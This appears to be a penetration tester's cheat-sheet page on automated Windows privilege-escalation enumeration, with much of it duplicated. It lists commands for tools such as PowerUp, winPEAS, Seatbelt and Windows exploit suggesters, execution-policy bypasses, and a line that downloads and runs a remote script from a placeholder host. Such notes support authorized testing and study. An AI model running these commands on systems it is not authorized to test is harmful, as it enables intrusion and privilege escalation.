enumeration auto

Previouswindows-enumeration Nextenumeration manual

Last updated 3 years ago

Was this helpful?

enumeration auto

Path fix

set PATH=C:\Windows;C:\Windows\system32;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;%PATH%

Get-ExecutionPolicy -List
Set-ExecutionPolicy Unrestricted

Check Arch, Process, Release ID

PS> [system.environment]::Is64BitOperatingSystem
PS> [system.environment]::Is64BitProcess
> echo %PROCESSOR_ARCHITECTURE%

PS > Get-ComputerInfo | select WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
PS> (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId).ReleaseId
PS> (Get-WmiObject -class Win32_OperatingSystem).Caption
PS> [System.Environment]::OSVersion.Version

| | |

# located at /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1

> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks -Format List}"
[OR]
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks -Format List

> powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
[OR]
PS> . .\Sherlock.ps1
PS> Find-AllVulns

# located at /opt/JAWS/jaws-enum.ps1

> powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://IP/jaws.ps1')

# located at /opt/Privesc/privesc.ps1
> powershell.exe -exec bypass -Command "& {Import-Module .\p.ps1; Invoke-Privesc -Groups 'Users,Everyone,Authenticated Users' -Whoami -Extended -Long}"

# need .NET 4.0
# cmd check
> dir /b %windir%\Microsoft.NET\Framework\v*
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
> reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s

# check for .NET using PS
PS> cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
PS> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version

winPEASany.exe quiet [cmd fast] [flag]
# systeminfo; userinfo; processinfo;
# servicesinfo; applicationsinfo; networkinfo;
# windowscreds; browserinfo; filesinfo; eventsinfo

# located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/

> .\Seatbelt.exe -group=[all | <check>] -outputfile="FULL-PATH"

# located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/

> .\SharpUp.exe

# needs python2
# copy .
# FIX: python2 -m pip install 'xlrd==1.2.0'

./windows-exploit-s.py --update
./windows-exploit-s.py -d <DB-FILE> -i <SYSTEMINFO.txt> [--hotfixes <>]

# if cannot get hotfixes using systeminfo
wmic qfe list full

python3 /opt/wesng/wes.py sys.txt --update
python3 /opt/wesng/wes.py systeminfo.txt [--exploits-only] -o wes.csv
# --impact | -i "Remote Code Execution" | "Elevation of Privilege"
# --severity critical

Previouswindows-enumeration Nextenumeration manual

Last updated 3 years ago

Was this helpful?

Path fix

set PATH=C:\Windows;C:\Windows\system32;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;%PATH%

Get-ExecutionPolicy -List
Set-ExecutionPolicy Unrestricted

Check Arch, Process, Release ID

PS> [system.environment]::Is64BitOperatingSystem
PS> [system.environment]::Is64BitProcess
> echo %PROCESSOR_ARCHITECTURE%

PS > Get-ComputerInfo | select WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
PS> (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId).ReleaseId
PS> (Get-WmiObject -class Win32_OperatingSystem).Caption
PS> [System.Environment]::OSVersion.Version

| | |

# located at /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1

> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks -Format List}"
[OR]
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks -Format List

> powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
[OR]
PS> . .\Sherlock.ps1
PS> Find-AllVulns

# located at /opt/JAWS/jaws-enum.ps1

> powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://IP/jaws.ps1')

# located at /opt/Privesc/privesc.ps1
> powershell.exe -exec bypass -Command "& {Import-Module .\p.ps1; Invoke-Privesc -Groups 'Users,Everyone,Authenticated Users' -Whoami -Extended -Long}"

| |

# need .NET 4.0
# cmd check
> dir /b %windir%\Microsoft.NET\Framework\v*
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
> reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4" /s

# check for .NET using PS
PS> cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
PS> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version

winPEASany.exe quiet [cmd fast] [flag]
# systeminfo; userinfo; processinfo;
# servicesinfo; applicationsinfo; networkinfo;
# windowscreds; browserinfo; filesinfo; eventsinfo

# located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/

> .\Seatbelt.exe -group=[all | <check>] -outputfile="FULL-PATH"

# located at /usr/share/windows-resources/Ghostpack-CompiledBinaries/

> .\SharpUp.exe

|

# needs python2
# copy .
# FIX: python2 -m pip install 'xlrd==1.2.0'

./windows-exploit-s.py --update
./windows-exploit-s.py -d <DB-FILE> -i <SYSTEMINFO.txt> [--hotfixes <>]

# if cannot get hotfixes using systeminfo
wmic qfe list full

python3 /opt/wesng/wes.py sys.txt --update
python3 /opt/wesng/wes.py systeminfo.txt [--exploits-only] -o wes.csv
# --impact | -i "Remote Code Execution" | "Elevation of Privilege"
# --severity critical

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub